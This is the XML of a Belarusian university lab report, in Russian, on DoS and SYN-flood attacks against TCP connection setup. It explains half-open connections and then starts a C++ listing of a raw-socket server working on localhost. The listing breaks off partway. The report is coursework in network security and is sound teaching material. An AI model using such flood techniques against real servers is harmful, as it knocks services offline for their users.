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hdphoto1.wdp" ContentType="image/vnd.ms-photo"/>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Министерство образования Республики Беларусь</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Учреждение образования</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БЕЛОРУССКИЙ ГОСУДАРСТВЕННЫЙ УНИВЕРСИТЕТ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ИНФОРМАТИКИ И РАДИОЭЛЕКТРОНИКИ</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Факультет компьютерных систем и сетей</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Кафедра информатики </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Дисциплина: Информационные сети. Основы безопасности</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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОТЧЕТ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 лабораторной работе №</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3</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на тему</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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>АТАКИ ПРИ УСТАНОВКЕ TCP-СОЕДИНЕНИЯ И ПРОТОКОЛОВ ПРИКЛАДНОГО УРОВНЯ</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w:t>
        <w:tab/>
        <w:t>А. В. Скворцов</w:t>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Преподаватель</w:t>
        <w:tab/>
        <w:t>Е. А. Лещенко</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="6946" w:leader="none"/>
        </w:tabs>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Минск 2024</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="true"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="ContentsHeading"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:br w:type="page"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>СОДЕРЖАНИЕ</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Normal"/>
            <w:spacing w:lineRule="auto" w:line="24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1"/>
            <w:spacing w:lineRule="auto" w:line="240"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
              <w:kern w:val="2"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:eastAsia="ru-RU"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:webHidden/>
              <w:rStyle w:val="IndexLink"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \z \o "1-3" \u \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:webHidden/>
              <w:rStyle w:val="IndexLink"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc160192830">
            <w:r>
              <w:rPr>
                <w:webHidden/>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc160192830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spacing w:lineRule="auto" w:line="240"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
              <w:kern w:val="2"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:eastAsia="ru-RU"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc160192831">
            <w:r>
              <w:rPr>
                <w:webHidden/>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1 Результат выполнения</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc160192831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spacing w:lineRule="auto" w:line="240"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
              <w:kern w:val="2"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:eastAsia="ru-RU"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc160192832">
            <w:r>
              <w:rPr>
                <w:webHidden/>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Заключение</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc160192832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spacing w:lineRule="auto" w:line="240"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
              <w:kern w:val="2"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:eastAsia="ru-RU"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc160192833">
            <w:r>
              <w:rPr>
                <w:webHidden/>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Приложение А (обязательное) Листинг кода</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc160192833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Normal"/>
            <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:rPr/>
          </w:r>
          <w:r>
            <w:rPr/>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:left="-567" w:firstLine="709"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc160192830"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>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ходе лабораторной работы нужно разработать программные средства, реализующие атаки на протокол </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> при установлении соединения между клиентом и сервером. В качестве задачи для лабораторной работы были выбраны атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, представляющая собой многочисленную отправку данных на сервер для исчерпания его ресурсов и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атака, из-за которой сервер вынужден держать большое количество открытых соединений, потому что работа транспортного уровня была нарушена.</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1" w:name="_Toc160192831"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>РЕЗУЛЬТАТ ВЫПОЛНЕНИЯ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>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результате работы было создано две программы, первая из которых реализована в виде клиент-серверного приложения, где клиент является злоумышленником, проводящим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-атаку на сервер. Сервер выдерживает определенное количество запросов, потом перестает отвечать, т.к. был достигнут лимит подключений и сервер «упал» в ошибку (рисунок 1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:spacing w:lineRule="auto" w:line="276"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc160192832"/>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="439039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390390" cy="1343025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing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 xml:space="preserve">Рисунок 1 – Последствия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-атаки для сервера</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing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На следующем рисунке можно видеть, что после определенного количества подключений сервер перестал обрабатывать новые подключения и, соответственно, отвечать клиенту. Так как клиент выполнил свою цель, то клиентская часть программы завершила свою работу (рисунок 2).</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4390390" cy="13430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390390" cy="1343025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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 xml:space="preserve">Рисунок 2 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-атака в клиенте</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Вторая программа является реализацией SYN-flood атаки, принцип работы которой заключается в следующем: злоумышленник (в данном случае клиент) посылает огромное количество запросов установки соединения на атакуемый сервер. Сервер, видя сегменты с флагом SYN, выделяет необходимые ресурсы для поддержания соединения и отправляет в ответ сегменты с флагами SYN и ACK, переходя в состояние SYN-RECEIVED (такое состояние еще называют полуоткрытым соединением).</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Злоумышленник, не шлет ответные ACK сегменты, а продолжает бомбардировать сервер SYN-запросами, тем самым вынуждая сервер создавать все больше и больше полуоткрытых соединений. Сервер, понятное дело, располагает ограниченными ресурсами, и потому имеет лимит на количество полуоткрытых соединений.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Ввиду этой ограниченности, при достижении предельного числа полуоткрытых соединений сервер начинает отклонять новые попытки соединения; таким образом и достигается отказ в обслуживании. В случае реализации программы, сервер просто видит, что соединения продолжаются, но не может на них ответить ввиду неработоспособности (рисунок 3).</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bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3997960" cy="23145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rcRect l="0" t="1070" r="0" b="11789"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3997960" cy="2314575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 3 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атака</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing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r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc160192832"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>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результате выполнения данной лабораторной работы были разработаны программные средства для проведения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-атаки и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаки на языке программирования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </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Также было проведено изучение протокола </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и транспортного уровня, рассмотрены наиболее частые примеры атак на этот протокол.</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240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc160192833"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ПРИЛОЖЕНИЕ А</w:t>
        <w:br/>
        <w:t>(обязательное)</w:t>
        <w:br/>
        <w:t>Листинг кода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>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pBdr/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Листинг 1 – Файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cpp</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&lt;arpa/inet.h&gt;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&lt;netinet/in.h&gt;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&lt;netinet/ip.h&gt;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&lt;netinet/tcp.h&gt;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&lt;pthread.h&gt;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&lt;string.h&gt;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&lt;sys/socket.h&gt;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&lt;unistd.h&gt;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&lt;atomic&gt;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&lt;iostream&gt;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&lt;memory&gt;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&lt;thread&gt;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#include "libs/utils.cpp"</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int sock_client;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std::atomic&lt;long long&gt; G_ACK_CNT(0);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std::atomic&lt;long long&gt; G_SYN_CNT(0);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bool is_connected = false;</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void *tcp_shk(void *arg)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char datagram[4096], source_ip[32];</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strcpy(source_ip, "127.0.0.1");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memset(datagram, 0, 4096);</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struct sockaddr_in sin;</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sin.sin_family = AF_INET;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sin.sin_port = htons(8000);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sin.sin_addr.s_addr = inet_addr(source_ip);</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auto iph = fillIPHeader(datagram, source_ip, sin);</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auto tcph = fillTCPHeader(datagram);</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tcph-&gt;ack = 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auto psh = fillFakeHeader(source_ip, sin);</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memcpy(&amp;psh.tcp, tcph, sizeof(struct tcphdr));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tcph-&gt;check = checksum((unsigned short *)&amp;psh, sizeof(FakeHeader));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send(sock_client, datagram, strlen(datagram),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G_ACK_CNT++;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std::cout &lt;&lt; "ACK №" &lt;&lt; G_ACK_CNT &lt;&lt; " sended"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char msg[4000];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ssize_t err = recv(-1, msg, 4000,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pthread_exit(0);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void *server_receive(void *arg)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char msg[4000];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while (true)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ssize_t err = recv(sock_client, msg, 4000,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if (err &gt; 0)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msg[3999] =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G_SYN_CNT++;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std::cout &lt;&lt; "Connection SYN №" &lt;&lt; G_SYN_CNT &lt;&lt; " received"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pthread_t thread;</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pthread_create(&amp;thread, NULL, tcp_shk, NULL);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if (err == 0)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break;</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if (err == -1)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handle_error_en(err, "recv");</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pthread_exit(0);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int main(int argc, char **argv)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pthread_attr_t attr;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int err = pthread_attr_init(&amp;attr);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(err != 0)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handle_error_en(err, "pthread_attr_init");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int socket_descr = socket(AF_INET, SOCK_STREAM,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(socket_descr == -1)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handle_error_en(socket_descr, "socket(2)");</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struct sockaddr_in 